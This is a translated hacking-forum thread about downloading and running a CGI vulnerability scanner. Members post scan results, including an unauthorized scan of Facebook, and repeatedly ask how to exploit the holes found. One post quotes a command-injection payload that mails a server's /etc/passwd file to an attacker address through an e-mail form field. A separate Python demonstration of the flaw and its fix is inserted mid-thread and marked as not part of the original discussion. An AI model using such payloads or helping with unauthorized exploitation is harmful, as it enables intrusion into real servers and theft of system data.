
CGI Vulnerability Scanner


A place for discussion and tutorials on using tools for hacking, security and computer forensics.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tools uploaded by members are not checked by us and may be infected with malware, intentionally or not; we recommend downloading the tool from its original author's source. Anyone starting a thread is expected to include a screenshot of the tool.

CGI Vulnerability Scanner

Postby poni » Wed Apr 28, 2010 8:15 pm

Code:
Download : http://www.ziddu.com/download/9644394/CGIVulnerabilityScan.zip.html


CGI Vulnerability Scanner is a tool for checking for CGI weaknesses on a web server.
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: CGI Vulnerability Scanner

Postby cyber_criminal » Wed Apr 28, 2010 8:45 pm

Permission to download and try it out, bro
:devil :devil :devil
Hacking is not about answers. Hacking is about the path you take to find the answers. If you need help, don't ask for the answer; ask about the path you should take to find the answer for yourself.
cyber_criminal
 
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: CGI Vulnerability Scanner

Postby peniru » Wed May 05, 2010 2:25 pm

Bro poni, I've tried it and got the following result
Code:
Mode: Scan for all CGI holes (Total: 495)

Hole found: iss ../..
Hole found: logs

Scan Complete - 2 holes found.


So how do you exploit the holes above, bro?

Please enlighten me :devil :devil
.::. My Sign .::.
..noobie Pool..
Using tools or not doesn't matter; what matters is understanding what you are doing
karma37.wordpress.com
koleksiomel.blogspot.co.id
peniru
 
Posts: 387
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: CGI Vulnerability Scanner

Postby demonbrando » Thu May 06, 2010 12:17 am

Permission to download, poni... this is great... :love: :tapa:
Live this life at ease, but don't forget to worship..
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: CGI Vulnerability Scanner

Postby cyber_terror1st » Sun May 16, 2010 11:06 pm

Bro, I still don't understand how to inject it :omg: :omg: :omg:
i'm cyber_terror1st and i'm proud of what i'm supposed to be
cyber_terror1st
 
Posts: 144
Joined: Fri Apr 30, 2010 8:35 pm

Re: CGI Vulnerability Scanner

Postby 3xtr3m3b0y » Mon May 17, 2010 11:51 am

Wew CGI Vulnerability Scanner running perfecto on my Ubuntu...

...n0 l1m17...
3xtr3m3b0y
 
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~

Re: CGI Vulnerability Scanner

Postby peniru » Mon May 17, 2010 4:37 pm

Just for fun I scanned Facebook with CGI Vulnerability Scanner and found this...

Code:
Host: http://www.facebook.com/
Mode: Scan for all CGI holes (Total: 495)

Hole found: config.sys
Hole found: .fhp
Hole found: access.cnf
Hole found: access.cnf
Hole found: achg.htr
Hole found: addcontent.cfm
Hole found: add_ftp.cgi
Hole found: admcgi contents
Hole found: admin.dll
Hole found: admin.php3
Hole found: admin.pwd
Hole found: administrat.pwd
Hole found: admnlogin
Hole found: advsearch.asp
Hole found: aexp.htr
Hole found: aexp2
Hole found: aexp2.htr
Hole found: aexp2b.htr
Hole found: aexp3.htr
Hole found: aexp4.htr
Hole found: aexp4b.htr
Hole found: aglimpse
Hole found: alibaba hole
Hole found: AnForm2
Hole found: anot.htr
Hole found: anot3.htr
Hole found: AnyBoard.cgi
Hole found: AnyForm2
Hole found: application.cfm
Hole found: application.cfm
Hole found: archie
Hole found: architext_q.cgi
Hole found: args.bat
Hole found: args.bat
Hole found: args.cmd
Hole found: args.cmd
Hole found: ASPSeek
Hole found: AT-admin
Hole found: AT-generate.cgi
Hole found: author.dll
Hole found: authors.pwd
Hole found: autoexec.bat
Hole found: aux check
Hole found: ax-admin.cgi
Hole found: ax.cgi
Hole found: axs.cgi
Hole found: bb-hist.sh
Hole found: bb-hist.sh
Hole found: bdir.htr - sampl
Hole found: beaninfo.cfm
Hole found: bigconf.cgi
Hole found: bizdb1-search.cgi
Hole found: bnbform.cgi
Hole found: Boa?? 8-)
Hole found: BOOZT!
Hole found: bsguest.cgi
Hole found: bslist.cgi
Hole found: c32web.exe 2
Hole found: c32web.exe
Hole found: cachemgr.cgi
Hole found: calendar
Hole found: campas
Hole found: carbo.dll
Hole found: cart.pl
Hole found: cart32.exe
Hole found: cart32clientlist


Code:
 ASPSeek
ASPSeek is an open source search engine software developed by SWsoft.
Several buffer overflow vulnerabilities enable remote attackers to execute code on the web server remotely, with the privileges of the web server.
Exploit:
Code to large to include here. Check a vulnerability search engine for more information.


Code:
bnbform.cgi
form sends a responding email to users with the contents of any file contained in the 'automessage' variable. This can be used to specify any file that is readable by the uid of the webserver.
Exploit:
The exploit is an html form, but was too large to include here. Please search for "bnbform exploit" at a good search engine to get the code.


Code:
bslist.cgi
BSList doesn't filter out ; allowing anyone to execute commands on the server.
Exploit:
This can be exploited by signing up for the mailing list with the email address of:
hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd


Code:
bsguest.cgi
The attacker just enters his email address as:
hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd
and then the server mails a confirmation letter along with the passwd file to the attacker.


Can those holes be exploited? I'm still a newbie... :pusing: :pusing: .... and that's only some of the holes that this tool managed to scan
:devil :devil
.::. My Sign .::.
..noobie Pool..
Using tools or not doesn't matter; what matters is understanding what you are doing
karma37.wordpress.com
koleksiomel.blogspot.co.id
peniru
 
Posts: 387
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
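
The bslist.cgi and bsguest.cgi descriptions quoted in the post above come down to one flaw: the e-mail field is placed into a shell command line, so `;` starts a second command. The following is an added example, not code from the thread or from the scanner, showing that pattern beside a hardened form. It assumes `echo` as a harmless stand-in for the mail program; the function names and the sample input are hypothetical and constructed for the demonstration.

```python
import re
import subprocess

# Assumption for a safe, offline demo: `echo` stands in for the mail program,
# so nothing is sent and the "command" only prints its arguments.
MAILER = "echo"

# Constructed input: an address followed by ';' and a harmless second command.
PAYLOAD = "user@example.com; echo INJECTED"

# Conservative allow-list; the first character must be alphanumeric so the
# value can never be read as a command-line option.
EMAIL_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def subscribe_vulnerable(email: str) -> str:
    """Flawed pattern: the address is pasted into a shell command line."""
    cmd = f"{MAILER} confirmation-to {email}"
    # shell=True hands the string to /bin/sh, which treats ';' as a separator.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def send_no_shell(email: str) -> str:
    """Argument-vector call: no shell parses the value, so ';' is plain data."""
    argv = [MAILER, "confirmation-to", email]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def subscribe_hardened(email: str) -> str:
    """Validate first, then call the mailer without a shell."""
    if len(email) > 254 or not EMAIL_RE.fullmatch(email):
        raise ValueError("rejected e-mail address")
    return send_no_shell(email)


if __name__ == "__main__":
    print("vulnerable:", subscribe_vulnerable(PAYLOAD).splitlines())
    print("no shell:  ", send_no_shell(PAYLOAD).splitlines())
    try:
        subscribe_hardened(PAYLOAD)
    except ValueError as exc:
        print("hardened:  ", exc)
    print("hardened:  ", subscribe_hardened("user@example.com").splitlines())
```

Either layer alone stops the second command from running; validation additionally keeps malformed addresses away from the mailer.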

Re: CGI Vulnerability Scanner

Postby X-Volm » Tue Aug 24, 2010 1:37 am

Looks great...
Time for some trial and error first, ahh.... :malumalu:
X-Volm
 
Posts: 2
Joined: Sat Aug 21, 2010 6:58 pm
Location: Bekasi

Re: CGI Vulnerability Scanner

Postby choiroel » Tue Aug 24, 2010 6:05 am

:ngakak: :ngakak: :ngakak:
heading straight to the scene
When your religion and your sect are something you got from birth... no need to act like you're right... that's just how doctrine and dogma are
choiroel
 
Posts: 106
Joined: Tue Jun 09, 2009 2:19 am
Location: Pati | Yogjakarta

Re: CGI Vulnerability Scanner

Postby choiroel » Tue Aug 24, 2010 7:01 am

Code:
Mode: Scan for all CGI holes (Total: 495)


Scan Complete - 495 holes found.

Now that it looks like this, what next.... Please enlighten me... :maaf: :maaf:
When your religion and your sect are something you got from birth... no need to act like you're right... that's just how doctrine and dogma are
choiroel
 
Posts: 106
Joined: Tue Jun 09, 2009 2:19 am
Location: Pati | Yogjakarta
